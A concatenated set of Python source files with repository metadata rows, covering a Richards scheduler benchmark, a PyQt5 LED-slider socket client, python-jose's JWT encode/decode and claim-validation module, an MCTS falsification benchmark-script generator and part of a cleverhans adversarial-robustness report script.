w.count = 1
pkt.data[i] = A + w.count - 1
i = i + 1
return self.qpkt(pkt)
def schedule() -> None:
t: Task | None = taskWorkArea.taskList
while t is not None:
if tracing:
print("tcb =", t.ident)
if t.isTaskHoldingOrWaiting():
t = t.link
else:
if tracing:
trace(chr(ord("0") + t.ident))
t = t.runTask()
class Richards(object):
def run(self, iterations: int) -> bool:
for i in range(iterations):
taskWorkArea.holdCount = 0
taskWorkArea.qpktCount = 0
IdleTask(I_IDLE, 1, 10000, TaskState().running(), IdleTaskRec())
wkq = Packet(None, 0, K_WORK)
wkq = Packet(wkq, 0, K_WORK)
WorkTask(I_WORK, 1000, wkq, TaskState(
).waitingWithPacket(), WorkerTaskRec())
wkq = Packet(None, I_DEVA, K_DEV)
wkq = Packet(wkq, I_DEVA, K_DEV)
wkq = Packet(wkq, I_DEVA, K_DEV)
HandlerTask(I_HANDLERA, 2000, wkq, TaskState(
).waitingWithPacket(), HandlerTaskRec())
wkq = Packet(None, I_DEVB, K_DEV)
wkq = Packet(wkq, I_DEVB, K_DEV)
wkq = Packet(wkq, I_DEVB, K_DEV)
HandlerTask(I_HANDLERB, 3000, wkq, TaskState(
).waitingWithPacket(), HandlerTaskRec())
wkq = None
DeviceTask(I_DEVA, 4000, wkq,
TaskState().waiting(), DeviceTaskRec())
DeviceTask(I_DEVB, 5000, wkq,
TaskState().waiting(), DeviceTaskRec())
schedule()
if taskWorkArea.holdCount == 9297 and taskWorkArea.qpktCount == 23246:
pass
else:
return False
return True
if __name__ == "__main__":
num_iterations = 1
if len(sys.argv) > 1:
num_iterations = int(sys.argv[1])
Richards().run(num_iterations)
| 25.811321 | 102 | 0.567343 |
d0a5d3dc002db24fd5e6d16c04416c065a74ad3f | 1,390 | py | Python | client_led_slider.py | chenphilip888/rockpi4b-qt5-wifi | e36deba2b12b8c5a6586c92713651ba849d3190b | [
"MIT"
] | null | null | null | client_led_slider.py | chenphilip888/rockpi4b-qt5-wifi | e36deba2b12b8c5a6586c92713651ba849d3190b | [
"MIT"
] | null | null | null | client_led_slider.py | chenphilip888/rockpi4b-qt5-wifi | e36deba2b12b8c5a6586c92713651ba849d3190b | [
"MIT"
] | null | null | null | #!/usr/bin/python3
import socket
import time
import sys
from PyQt5.QtWidgets import (QWidget, QMainWindow, QHBoxLayout, QStatusBar, QSlider, QApplication)
from PyQt5.QtCore import Qt
HOST = '192.168.86.205' # The remote host
PORT = 50007 # The same port as used by the server
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((HOST, PORT))
class Client_led_slider(QMainWindow):
def __init__(self):
super().__init__()
self.initUI()
def initUI(self):
self.widget = QWidget()
self.setCentralWidget(self.widget)
self.sld = QSlider(Qt.Horizontal, self)
self.sld.setRange(0, 100)
self.sld.valueChanged[int].connect(self.changeValue)
hbox = QHBoxLayout(self.widget)
hbox.addWidget(self.sld)
self.widget.setLayout(hbox)
self.statusBar()
self.setGeometry(300, 300, 290, 150)
self.setWindowTitle('client led slider')
self.show()
def changeValue(self):
str_val = str(self.sld.value())
sock.sendall(str_val.encode('utf-8'))
data = sock.recv(1024)
self.statusBar().showMessage(repr(data))
if __name__ == '__main__':
app = QApplication(sys.argv)
ex = Client_led_slider()
sys.exit(app.exec_())
| 24.385965 | 98 | 0.605755 |
e8bf77eeac01b0a9f8b86fa914fce8bfc398b174 | 16,665 | py | Python | jose/jwt.py | Budovi/python-jose | a247cec58a5aa4ea5d3b45e3c90d55f66d98288f | [
"MIT"
] | 1 | 2018-12-19T10:30:05.000Z | 2018-12-19T10:30:05.000Z | jose/jwt.py | Budovi/python-jose | a247cec58a5aa4ea5d3b45e3c90d55f66d98288f | [
"MIT"
] | null | null | null | jose/jwt.py | Budovi/python-jose | a247cec58a5aa4ea5d3b45e3c90d55f66d98288f | [
"MIT"
] | null | null | null |
import json
from calendar import timegm
from collections import Mapping
from datetime import datetime
from datetime import timedelta
from six import string_types
from jose import jws
from .exceptions import JWSError
from .exceptions import JWTClaimsError
from .exceptions import JWTError
from .exceptions import ExpiredSignatureError
from .constants import ALGORITHMS
from .utils import timedelta_total_seconds, calculate_at_hash
def encode(claims, key, algorithm=ALGORITHMS.HS256, headers=None, access_token=None):
"""Encodes a claims set and returns a JWT string.
JWTs are JWS signed objects with a few reserved claims.
Args:
claims (dict): A claims set to sign
key (str or dict): The key to use for signing the claim set. Can be
individual JWK or JWK set.
algorithm (str, optional): The algorithm to use for signing the
the claims. Defaults to HS256.
headers (dict, optional): A set of headers that will be added to
the default headers. Any headers that are added as additional
headers will override the default headers.
access_token (str, optional): If present, the 'at_hash' claim will
be calculated and added to the claims present in the 'claims'
parameter.
Returns:
str: The string representation of the header, claims, and signature.
Raises:
JWTError: If there is an error encoding the claims.
Examples:
>>> jwt.encode({'a': 'b'}, 'secret', algorithm='HS256')
'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhIjoiYiJ9.jiMyrsmD8AoHWeQgmxZ5yq8z0lXS67_QGs52AzC8Ru8'
"""
for time_claim in ['exp', 'iat', 'nbf']:
# Convert datetime to a intDate value in known time-format claims
if isinstance(claims.get(time_claim), datetime):
claims[time_claim] = timegm(claims[time_claim].utctimetuple())
if access_token:
claims['at_hash'] = calculate_at_hash(access_token,
ALGORITHMS.HASHES[algorithm])
return jws.sign(claims, key, headers=headers, algorithm=algorithm)
def decode(token, key, algorithms=None, options=None, audience=None,
issuer=None, subject=None, access_token=None):
"""Verifies a JWT string's signature and validates reserved claims.
Args:
token (str): A signed JWS to be verified.
key (str or dict): A key to attempt to verify the payload with. Can be
individual JWK or JWK set.
algorithms (str or list): Valid algorithms that should be used to verify the JWS.
audience (str): The intended audience of the token. If the "aud" claim is
included in the claim set, then the audience must be included and must equal
the provided claim.
issuer (str or iterable): Acceptable value(s) for the issuer of the token.
If the "iss" claim is included in the claim set, then the issuer must be
given and the claim in the token must be among the acceptable values.
subject (str): The subject of the token. If the "sub" claim is
included in the claim set, then the subject must be included and must equal
the provided claim.
access_token (str): An access token string. If the "at_hash" claim is included in the
claim set, then the access_token must be included, and it must match
the "at_hash" claim.
options (dict): A dictionary of options for skipping validation steps.
defaults = {
'verify_signature': True,
'verify_aud': True,
'verify_iat': True,
'verify_exp': True,
'verify_nbf': True,
'verify_iss': True,
'verify_sub': True,
'verify_jti': True,
'verify_at_hash': True,
'leeway': 0,
}
Returns:
dict: The dict representation of the claims set, assuming the signature is valid
and all requested data validation passes.
Raises:
JWTError: If the signature is invalid in any way.
ExpiredSignatureError: If the signature has expired.
JWTClaimsError: If any claim is invalid in any way.
Examples:
>>> payload = 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhIjoiYiJ9.jiMyrsmD8AoHWeQgmxZ5yq8z0lXS67_QGs52AzC8Ru8'
>>> jwt.decode(payload, 'secret', algorithms='HS256')
"""
defaults = {
'verify_signature': True,
'verify_aud': True,
'verify_iat': True,
'verify_exp': True,
'verify_nbf': True,
'verify_iss': True,
'verify_sub': True,
'verify_jti': True,
'verify_at_hash': True,
'leeway': 0,
}
if options:
defaults.update(options)
verify_signature = defaults.get('verify_signature', True)
try:
payload = jws.verify(token, key, algorithms, verify=verify_signature)
except JWSError as e:
raise JWTError(e)
# Needed for at_hash verification
algorithm = jws.get_unverified_header(token)['alg']
try:
claims = json.loads(payload.decode('utf-8'))
except ValueError as e:
raise JWTError('Invalid payload string: %s' % e)
if not isinstance(claims, Mapping):
raise JWTError('Invalid payload string: must be a json object')
_validate_claims(claims, audience=audience, issuer=issuer,
subject=subject, algorithm=algorithm,
access_token=access_token,
options=defaults)
return claims
def get_unverified_header(token):
"""Returns the decoded headers without verification of any kind.
Args:
token (str): A signed JWT to decode the headers from.
Returns:
dict: The dict representation of the token headers.
Raises:
JWTError: If there is an exception decoding the token.
"""
try:
headers = jws.get_unverified_headers(token)
except Exception:
raise JWTError('Error decoding token headers.')
return headers
def get_unverified_headers(token):
"""Returns the decoded headers without verification of any kind.
This is simply a wrapper of get_unverified_header() for backwards
compatibility.
Args:
token (str): A signed JWT to decode the headers from.
Returns:
dict: The dict representation of the token headers.
Raises:
JWTError: If there is an exception decoding the token.
"""
return get_unverified_header(token)
def get_unverified_claims(token):
"""Returns the decoded claims without verification of any kind.
Args:
token (str): A signed JWT to decode the headers from.
Returns:
dict: The dict representation of the token claims.
Raises:
JWTError: If there is an exception decoding the token.
"""
try:
claims = jws.get_unverified_claims(token)
except Exception:
raise JWTError('Error decoding token claims.')
try:
claims = json.loads(claims.decode('utf-8'))
except ValueError as e:
raise JWTError('Invalid claims string: %s' % e)
if not isinstance(claims, Mapping):
raise JWTError('Invalid claims string: must be a json object')
return claims
def _validate_iat(claims):
"""Validates that the 'iat' claim is valid.
The "iat" (issued at) claim identifies the time at which the JWT was
issued. This claim can be used to determine the age of the JWT. Its
value MUST be a number containing a NumericDate value. Use of this
claim is OPTIONAL.
Args:
claims (dict): The claims dictionary to validate.
"""
if 'iat' not in claims:
return
try:
int(claims['iat'])
except ValueError:
raise JWTClaimsError('Issued At claim (iat) must be an integer.')
def _validate_nbf(claims, leeway=0):
"""Validates that the 'nbf' claim is valid.
The "nbf" (not before) claim identifies the time before which the JWT
MUST NOT be accepted for processing. The processing of the "nbf"
claim requires that the current date/time MUST be after or equal to
the not-before date/time listed in the "nbf" claim. Implementers MAY
provide for some small leeway, usually no more than a few minutes, to
account for clock skew. Its value MUST be a number containing a
NumericDate value. Use of this claim is OPTIONAL.
Args:
claims (dict): The claims dictionary to validate.
leeway (int): The number of seconds of skew that is allowed.
"""
if 'nbf' not in claims:
return
try:
nbf = int(claims['nbf'])
except ValueError:
raise JWTClaimsError('Not Before claim (nbf) must be an integer.')
now = timegm(datetime.utcnow().utctimetuple())
if nbf > (now + leeway):
raise JWTClaimsError('The token is not yet valid (nbf)')
def _validate_exp(claims, leeway=0):
"""Validates that the 'exp' claim is valid.
The "exp" (expiration time) claim identifies the expiration time on
or after which the JWT MUST NOT be accepted for processing. The
processing of the "exp" claim requires that the current date/time
MUST be before the expiration date/time listed in the "exp" claim.
Implementers MAY provide for some small leeway, usually no more than
a few minutes, to account for clock skew. Its value MUST be a number
containing a NumericDate value. Use of this claim is OPTIONAL.
Args:
claims (dict): The claims dictionary to validate.
leeway (int): The number of seconds of skew that is allowed.
"""
if 'exp' not in claims:
return
try:
exp = int(claims['exp'])
except ValueError:
raise JWTClaimsError('Expiration Time claim (exp) must be an integer.')
now = timegm(datetime.utcnow().utctimetuple())
if exp < (now - leeway):
raise ExpiredSignatureError('Signature has expired.')
def _validate_aud(claims, audience=None):
"""Validates that the 'aud' claim is valid.
The "aud" (audience) claim identifies the recipients that the JWT is
intended for. Each principal intended to process the JWT MUST
identify itself with a value in the audience claim. If the principal
processing the claim does not identify itself with a value in the
"aud" claim when this claim is present, then the JWT MUST be
rejected. In the general case, the "aud" value is an array of case-
sensitive strings, each containing a StringOrURI value. In the
special case when the JWT has one audience, the "aud" value MAY be a
single case-sensitive string containing a StringOrURI value. The
interpretation of audience values is generally application specific.
Use of this claim is OPTIONAL.
Args:
claims (dict): The claims dictionary to validate.
audience (str): The audience that is verifying the token.
"""
if 'aud' not in claims:
# if audience:
# raise JWTError('Audience claim expected, but not in claims')
return
audience_claims = claims['aud']
if isinstance(audience_claims, string_types):
audience_claims = [audience_claims]
if not isinstance(audience_claims, list):
raise JWTClaimsError('Invalid claim format in token')
if any(not isinstance(c, string_types) for c in audience_claims):
raise JWTClaimsError('Invalid claim format in token')
if audience not in audience_claims:
raise JWTClaimsError('Invalid audience')
def _validate_iss(claims, issuer=None):
"""Validates that the 'iss' claim is valid.
The "iss" (issuer) claim identifies the principal that issued the
JWT. The processing of this claim is generally application specific.
The "iss" value is a case-sensitive string containing a StringOrURI
value. Use of this claim is OPTIONAL.
Args:
claims (dict): The claims dictionary to validate.
issuer (str or iterable): Acceptable value(s) for the issuer that
signed the token.
"""
if issuer is not None:
if isinstance(issuer, string_types):
issuer = (issuer,)
if claims.get('iss') not in issuer:
raise JWTClaimsError('Invalid issuer')
def _validate_sub(claims, subject=None):
"""Validates that the 'sub' claim is valid.
The "sub" (subject) claim identifies the principal that is the
subject of the JWT. The claims in a JWT are normally statements
about the subject. The subject value MUST either be scoped to be
locally unique in the context of the issuer or be globally unique.
The processing of this claim is generally application specific. The
"sub" value is a case-sensitive string containing a StringOrURI
value. Use of this claim is OPTIONAL.
Args:
claims (dict): The claims dictionary to validate.
subject (str): The subject of the token.
"""
if 'sub' not in claims:
return
if not isinstance(claims['sub'], string_types):
raise JWTClaimsError('Subject must be a string.')
if subject is not None:
if claims.get('sub') != subject:
raise JWTClaimsError('Invalid subject')
def _validate_jti(claims):
"""Validates that the 'jti' claim is valid.
The "jti" (JWT ID) claim provides a unique identifier for the JWT.
The identifier value MUST be assigned in a manner that ensures that
there is a negligible probability that the same value will be
accidentally assigned to a different data object; if the application
uses multiple issuers, collisions MUST be prevented among values
produced by different issuers as well. The "jti" claim can be used
to prevent the JWT from being replayed. The "jti" value is a case-
sensitive string. Use of this claim is OPTIONAL.
Args:
claims (dict): The claims dictionary to validate.
"""
if 'jti' not in claims:
return
if not isinstance(claims['jti'], string_types):
raise JWTClaimsError('JWT ID must be a string.')
def _validate_at_hash(claims, access_token, algorithm):
"""
Validates that the 'at_hash' is valid.
Its value is the base64url encoding of the left-most half of the hash
of the octets of the ASCII representation of the access_token value,
where the hash algorithm used is the hash algorithm used in the alg
Header Parameter of the ID Token's JOSE Header. For instance, if the
alg is RS256, hash the access_token value with SHA-256, then take the
left-most 128 bits and base64url encode them. The at_hash value is a
case sensitive string. Use of this claim is OPTIONAL.
Args:
claims (dict): The claims dictionary to validate.
access_token (str): The access token returned by the OpenID Provider.
algorithm (str): The algorithm used to sign the JWT, as specified by
the token headers.
"""
if 'at_hash' not in claims:
return
if not access_token:
msg = 'No access_token provided to compare against at_hash claim.'
raise JWTClaimsError(msg)
try:
expected_hash = calculate_at_hash(access_token,
ALGORITHMS.HASHES[algorithm])
except (TypeError, ValueError):
msg = 'Unable to calculate at_hash to verify against token claims.'
raise JWTClaimsError(msg)
if claims['at_hash'] != expected_hash:
raise JWTClaimsError('at_hash claim does not match access_token.')
def _validate_claims(claims, audience=None, issuer=None, subject=None,
algorithm=None, access_token=None, options=None):
leeway = options.get('leeway', 0)
if isinstance(leeway, timedelta):
leeway = timedelta_total_seconds(leeway)
if not isinstance(audience, (string_types, type(None))):
raise JWTError('audience must be a string or None')
if options.get('verify_iat'):
_validate_iat(claims)
if options.get('verify_nbf'):
_validate_nbf(claims, leeway=leeway)
if options.get('verify_exp'):
_validate_exp(claims, leeway=leeway)
if options.get('verify_aud'):
_validate_aud(claims, audience=audience)
if options.get('verify_iss'):
_validate_iss(claims, issuer=issuer)
if options.get('verify_sub'):
_validate_sub(claims, subject=subject)
if options.get('verify_jti'):
_validate_jti(claims)
if options.get('verify_at_hash'):
_validate_at_hash(claims, access_token, algorithm)
| 34.64657 | 117 | 0.666787 |
ba08121f88fb3ccf2749280317bf3409d5497413 | 9,944 | py | Python | test/MCTS_test.py | choshina/coverage-confidence | c8b7fb2dc43094f0eb78abbdd6211dcefb6d4a63 | [
"CNRI-Python"
] | null | null | null | test/MCTS_test.py | choshina/coverage-confidence | c8b7fb2dc43094f0eb78abbdd6211dcefb6d4a63 | [
"CNRI-Python"
] | null | null | null | test/MCTS_test.py | choshina/coverage-confidence | c8b7fb2dc43094f0eb78abbdd6211dcefb6d4a63 | [
"CNRI-Python"
] | null | null | null | import sys
import os
model = ''
algorithm = ''
optimization = []
phi_str = []
controlpoints = ''
scalar = []
partitions = []
T_playout = []
N_max = []
input_name = []
input_range = []
status = 0
arg = ''
linenum = 0
timespan = ''
parameters = []
T = ''
loadfile = ''
addpath = []
argument = ''
trials = 30
#fal_home = os.environ['FALHOME']
#br_home = os.environ['BRHOME']
with open('./'+sys.argv[1],'r') as conf:
for line in conf.readlines():
argu = line.strip().split()
if status == 0:
status = 1
arg = argu[0]
linenum = int(argu[1])
elif status == 1:
linenum = linenum - 1
if arg == 'model':
model = argu[0]
elif arg == 'optimization':
optimization.append(argu[0])
elif arg == 'phi':
complete_phi = argu[0]+';'+argu[1]
for a in argu[2:]:
complete_phi = complete_phi + ' '+ a
phi_str.append(complete_phi)
elif arg == 'controlpoints':
controlpoints = argu[0]
elif arg == 'scalar':
scalar.append(float(argu[0]))
elif arg == 'partitions':
partitions.append(map(int,argu))
elif arg == 'T_playout':
T_playout.append(int(argu[0]))
elif arg == 'N_max':
N_max.append(int(argu[0]))
elif arg == 'input_name':
input_name.append(argu[0])
elif arg == 'input_range':
input_range.append([float(argu[0]),float(argu[1])])
elif arg == 'algorithm':
algorithm = argu[0]
elif arg == 'timespan':
timespan = argu[0]
elif arg == 'parameters':
parameters.append(argu[0])
elif arg == 'T':
T = argu[0]
elif arg == 'loadfile':
loadfile = argu[0]
elif arg == 'addpath':
addpath.append(argu[0])
elif arg == 'arg':
argument = argu[0]
else:
continue
if linenum == 0:
status = 0
print partitions
for ph in phi_str:
for cp in controlpoints:
for c in scalar:
for par in partitions:
for nm in N_max:
for opt in optimization:
for tp in T_playout:
property = ph.split(';')
par_str = '_'.join(str(i) for i in par)
filename = model + '_' + 'mcts' + '_'+property[0]+'_' + str(cp) +'_'+str(nm)+ '_' + str(tp) + '_' + opt
param = '\n'.join(parameters)
with open('benchmark/'+filename,'w') as bm:
bm.write('#!/bin/sh\n')
bm.write('csv=$1\n')
bm.write('matlab -nodesktop -nosplash <<EOF\n')
bm.write('clear;\n')
for ap in addpath:
bm.write('addpath(genpath(\'' + ap + '\'));\n')
bm.write('addpath(genpath(\'' + '.' + '\'));\n')
if loadfile!='':
bm.write('load '+loadfile + '\n')
bm.write('InitBreach;\n\n')
bm.write(param+ '\n')
bm.write('mdl = \''+ model + '\';\n')
bm.write('Br = BreachSimulinkSystem(mdl);\n')
bm.write('br = Br.copy();\n')
bm.write('N_max =' + str(nm) + ';\n')
bm.write('scalar = '+ str(c) +';\n')
bm.write('phi_str = \''+ property[1] +'\';\n')
bm.write('phi = STL_Formula(\'phi1\',phi_str);\n')
bm.write('T = ' + T + ';\n')
bm.write('controlpoints = '+ str(cp)+ ';\n')
bm.write('hill_climbing_by = \''+ opt+'\';\n')
bm.write('T_playout = '+str(tp)+';\n')
bm.write('input_name = {\''+input_name[0]+'\'')
for inm in input_name[1:]:
bm.write(',\'')
bm.write(inm)
bm.write('\'')
bm.write('};\n')
bm.write('input_range = [['+ str(input_range[0][0])+' '+str(input_range[0][1])+']')
for ir in input_range[1:]:
bm.write(';[')
bm.write(str(ir[0])+' '+str(ir[1]))
bm.write(']')
bm.write('];\n')
bm.write('partitions = ['+ str(par[0]))
for p in par[1:]:
bm.write(' ')
bm.write(str(p))
bm.write('];\n')
bm.write('filename = \''+filename+'\';\n')
bm.write('algorithm = \''+algorithm+ '\';\n')
bm.write('falsified_at_all = [];\n')
#bm.write('total_time = [];\n')
#bm.write('falsified_in_preprocessing = [];\n')
#bm.write('time_for_preprocessing = [];\n')
#bm.write('falsified_after_preprocessing = [];\n')
#bm.write('time_for_postpreprocessing = [];\n')
#bm.write('best_robustness = [];\n')
#bm.write('simulation_pre = [];\n')
#bm.write('simulation_after = [];\n')
#bm.write('simulations = [];\n')
bm.write('min_rob = [];\n')
bm.write('coverage = [];\n')
bm.write('time_cov = [];\n')
bm.write('trials =' + str(trials)+';\n')
bm.write('for i = 1:trials\n')
bm.write('\tm = MCTS(br,N_max, scalar, phi, T, controlpoints, hill_climbing_by, T_playout, input_name, input_range, partitions);\n')
bm.write('\tlog = m.log;\n')
# bm.write('\ttic\n')
#
# bm.write('\trange_t = get_full_range(input_range, controlpoints);\n')
# bm.write('\tct = CoverageTester(range_t, arg, log);\n')
# bm.write('\ttime = toc;\n')
# bm.write('\tmin_rob = [min_rob;ct.min_rob];\n')
# bm.write('\tcoverage = [coverage; ct.coverage];\n')
# bm.write('\ttime_cov = [time_cov;time];\n')
#bm.write('\t m = MCTS(br, N_max, scalar, phi, T, controlpoints, hill_climbing_by, T_playout, input_name, input_range, partitions);\n')
bm.write('\tlogname = strcat(\'test/log/' + filename + '_\', int2str(i));\n')
bm.write('\tsave(logname, \'log\');\n')
#bm.write('\t falsified_in_preprocessing = [falsified_in_preprocessing; m.falsified];\n')
#bm.write('\t time = toc;\n')
#bm.write('\t time_for_preprocessing = [time_for_preprocessing; time];\n')
#bm.write('\t simulation_pre = [simulation_pre;m.simulations];\n')
#bm.write('\t if m.falsified == 0\n')
#bm.write('\t\t BR = Br.copy();\n')
#bm.write('\t\t BR.Sys.tspan = '+ timespan +';\n')
#bm.write('\t\t input_gen.type = \'UniStep\';\n')
#bm.write('\t\t input_gen.cp = controlpoints;\n')
#bm.write('\t\t BR.SetInputGen(input_gen);\n')
#bm.write('\t\t range = m.best_children_range;\n')
#bm.write('\t\t r = numel(range);\n')
#bm.write('\t\t for cpi = 1:controlpoints\n')
#bm.write('\t\t\t for k = 1:numel(input_name)\n')
#bm.write('\t\t\t\t sig_name = strcat(input_name(k), \'_u\', num2str(cpi-1));\n')
#bm.write('\t\t\t\t if cpi <= r\n')
#bm.write('\t\t\t\t\t BR.SetParamRanges({sig_name},range(cpi).get_signal(k));\n')
#bm.write('\t\t\t\t else\n')
#bm.write('\t\t\t\t\t BR.SetParamRanges({sig_name},input_range(k,:));\n')
#bm.write('\t\t\t\t end\n')
#bm.write('\t\t\t end\n')
#bm.write('\t\t end\n')
#bm.write('\t\t falsif_pb = FalsificationProblem(BR, phi);\n')
#bm.write('\t\t falsif_pb.max_time = 300;\n')
#bm.write('\t\t falsif_pb.setup_solver(\'cmaes\');\n')
#bm.write('\t\t falsif_pb.solve();\n')
#bm.write('\t\t if falsif_pb.obj_best < 0\n')
#bm.write('\t\t\t time_for_postpreprocessing = [time_for_postpreprocessing; falsif_pb.time_spent];\n')
#bm.write('\t\t\t falsified_after_preprocessing = [falsified_after_preprocessing; 1];\n')
#bm.write('\t\t else\n')
#bm.write('\t\t\t time_for_postpreprocessing = [time_for_postpreprocessing; falsif_pb.time_spent];\n')
#bm.write('\t\t\t falsified_after_preprocessing = [falsified_after_preprocessing;0];\n')
#bm.write('\t\t end\n')
#bm.write('\t\tsimulation_after =[simulation_after;falsif_pb.nb_obj_eval];\n')
#bm.write('\t\tbest_robustness = [best_robustness;falsif_pb.obj_best];\n')
#bm.write('\t else\n')
#bm.write('\t\t falsified_after_preprocessing = [falsified_after_preprocessing; 1];\n')
#bm.write('\t\t time_for_postpreprocessing = [time_for_postpreprocessing; 0];\n')
#bm.write('\t\t best_robustness = [best_robustness;m.root_node.reward];\n')
#bm.write('\t\t simulation_after = [simulation_after;0];\n')
#bm.write('\t end\n')
bm.write('end\n')
#bm.write('falsified_at_all = falsified_after_preprocessing;\n')
#bm.write('total_time = time_for_preprocessing + time_for_postpreprocessing;\n')
#bm.write('simulations = simulation_pre + simulation_after;\n')
# bm.write('phi_str = {phi_str')
# for j in range(1,trials):
# bm.write(';phi_str')
# bm.write('};\n')
# bm.write('algorithm = {algorithm')
# for j in range(1,trials):
# bm.write(';algorithm')
# bm.write('};\n')
#bm.write('hill_climbing_by = {hill_climbing_by')
#for j in range(1,trials):
# bm.write(';hill_climbing_by')
# bm.write('};\n')
# bm.write('filename = {filename')
# for j in range(1,trials):
# bm.write(';filename')
# bm.write('};\n')
# bm.write('controlpoints = controlpoints*ones(trials,1);\n')
#bm.write('scalar = scalar*ones(trials,1);\n')
#bm.write('partitions = [partitions(1)*ones(trials,1) partitions(2)*ones(trials,1)];\n') #not generalized
#bm.write('partis = [];\n')
#bm.write('for u = 1:numel(partitions)\n')
#bm.write('\tpartis = [partis partitions(u)*ones(trials,1)];\n')
#bm.write('end\n')
#bm.write('T_playout = T_playout*ones(trials,1);\n')
# bm.write('N_max = N_max*ones(trials,1);\n')
#bm.write('result = table(filename, phi_str, algorithm, hill_climbing_by, controlpoints, scalar, partis, T_playout, N_max, falsified_at_all, total_time, simulations, best_robustness, falsified_in_preprocessing, time_for_preprocessing, falsified_after_preprocessing, time_for_postpreprocessing);\n')
# bm.write('result = table(filename, phi_str, algorithm, controlpoints, N_max, min_rob, coverage, time_cov);\n')
# bm.write('writetable(result,\'$csv\',\'Delimiter\',\';\');\n')
# bm.write('save_system(mdl+\'_breach\',false);\n')
bm.write('quit\n')
bm.write('EOF\n')
| 40.422764 | 306 | 0.567981 |
544046bd19bc3dcf26bc0fe9edb7569c58870669 | 2,193 | py | Python | quiz/users/models.py | diego-marcelino/valora-quiz | 3218628a857153449dde47ed52d60bc901e9be0b | [
"MIT"
] | null | null | null | quiz/users/models.py | diego-marcelino/valora-quiz | 3218628a857153449dde47ed52d60bc901e9be0b | [
"MIT"
] | 3 | 2022-02-28T11:07:18.000Z | 2022-03-02T11:07:20.000Z | quiz/users/models.py | diego-marcelino/valora-quiz | 3218628a857153449dde47ed52d60bc901e9be0b | [
"MIT"
] | null | null | null | from django.contrib.auth.models import AbstractUser
from django.contrib.auth.models import BaseUserManager
from django.db import models
from django.db.models import CharField
from django.utils.translation import gettext_lazy as _
from quiz.core.events.new_user import notify as notify_new_user
class UserManager(BaseUserManager):
"""Manager for user model."""
def create_user(self, name, username, role, password=None, **kwargs):
"""Create a new user and set password."""
if password is None:
raise TypeError(_('User should set a password'))
user = self.model(name=name, username=username, role=role, **kwargs)
user.set_password(password)
user.save()
notify_new_user(user)
return user
def create_superuser(self, username, name='', password=None, **kwargs):
"""Create a new super user."""
user = self.create_user(name, username, User.Role.SUPERUSER, password,
**kwargs)
user.is_superuser = True
user.is_staff = True
user.save()
return user
class User(AbstractUser):
"""Default user for Valora Quiz."""
class Role(models.TextChoices):
"""User role Choices."""
ADMIN = 'A', _('Admin')
PLAYER = 'P', _('Player')
SUPERUSER = 'S', _('Superuser')
#: First and last name do not cover name patterns around the globe
name = CharField(_('Name of User'), blank=True, max_length=255)
username = CharField(_('Username of user'), blank=False, max_length=50,
db_index=True, unique=True)
role = CharField(_('Role of the user'), max_length=1, choices=Role.choices,
default=Role.PLAYER)
objects = UserManager()
USERNAME_FIELD = 'username'
REQUIRED_FIELDS = ['password']
def __str__(self):
"""Return a string representation for user instance."""
return self.username
class Meta:
"""Meta info for user model."""
verbose_name = _('user')
verbose_name_plural = _('users')
ordering = ['username']
indexes = [models.Index(fields=['username'], name='username_idx')]
| 33.227273 | 79 | 0.632011 |
59d9a5de3ed1cc29bc72fcebb7bda7363d618922 | 4,027 | py | Python | scripts/make_confidence_report.py | iamgroot42/cleverhans | 53da9cd6daf9d7457800831c3eaa75f729a39145 | [
"MIT"
] | 21 | 2019-06-07T17:05:30.000Z | 2022-02-07T03:25:15.000Z | scripts/make_confidence_report.py | iamgroot42/cleverhans | 53da9cd6daf9d7457800831c3eaa75f729a39145 | [
"MIT"
] | 1 | 2021-03-01T15:06:09.000Z | 2021-03-01T15:06:09.000Z | scripts/make_confidence_report.py | iamgroot42/cleverhans | 53da9cd6daf9d7457800831c3eaa75f729a39145 | [
"MIT"
] | 8 | 2019-06-11T03:06:29.000Z | 2022-01-18T04:18:27.000Z | #!/usr/bin/env python3
"""
make_confidence_report.py
Usage:
python make_confidence_report.py model.joblib
where model.joblib is a file created by cleverhans.serial.save containing
a picklable cleverhans.model.Model instance.
This script will run the model on a variety of types of data and save an
instance of cleverhans.confidence_report.ConfidenceReport to
model_report.joblib.
The report can be later loaded by another script using cleverhans.serial.load.
This script puts the following entries in the report:
clean : Clean data
semantic : Semantic adversarial examples
mc: MaxConfidence adversarial examples
This script works by running a single MaxConfidence attack on each example.
( https://openreview.net/forum?id=H1g0piA9tQ )
This provides a reasonable estimate of the true failure rate quickly, so
long as the model does not suffer from gradient masking.
However, this estimate is mostly intended for development work and not
for publication. A more accurate estimate may be obtained by running
make_confidence_report_bundled.py instead.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import tensorflow as tf
from cleverhans.utils_tf import silence
silence()
# silence call must precede this imports. pylint doesn't like that
# pylint: disable=C0413
from cleverhans.compat import flags
from cleverhans.confidence_report import make_confidence_report
from cleverhans.confidence_report import BATCH_SIZE
from cleverhans.confidence_report import MC_BATCH_SIZE
from cleverhans.confidence_report import TRAIN_START
from cleverhans.confidence_report import TRAIN_END
from cleverhans.confidence_report import TEST_START
from cleverhans.confidence_report import TEST_END
from cleverhans.confidence_report import WHICH_SET
from cleverhans.confidence_report import NB_ITER
from cleverhans.confidence_report import BASE_EPS_ITER
from cleverhans.confidence_report import REPORT_PATH
from cleverhans.confidence_report import SAVE_ADVX
FLAGS = flags.FLAGS
def main(argv=None):
"""
Make a confidence report and save it to disk.
"""
try:
_name_of_script, filepath = argv
except ValueError:
raise ValueError(argv)
make_confidence_report(filepath=filepath, test_start=FLAGS.test_start,
test_end=FLAGS.test_end, which_set=FLAGS.which_set,
report_path=FLAGS.report_path,
mc_batch_size=FLAGS.mc_batch_size,
nb_iter=FLAGS.nb_iter,
base_eps_iter=FLAGS.base_eps_iter,
batch_size=FLAGS.batch_size,
save_advx=FLAGS.save_advx)
if __name__ == '__main__':
flags.DEFINE_integer('train_start', TRAIN_START, 'Starting point (inclusive)'
'of range of train examples to use')
flags.DEFINE_integer('train_end', TRAIN_END, 'Ending point (non-inclusive) '
'of range of train examples to use')
flags.DEFINE_integer('test_start', TEST_START, 'Starting point (inclusive) '
'of range of test examples to use')
flags.DEFINE_integer('test_end', TEST_END, 'End point (non-inclusive) of '
'range of test examples to use')
flags.DEFINE_integer('nb_iter', NB_ITER, 'Number of iterations of PGD')
flags.DEFINE_string('which_set', WHICH_SET, '"train" or "test"')
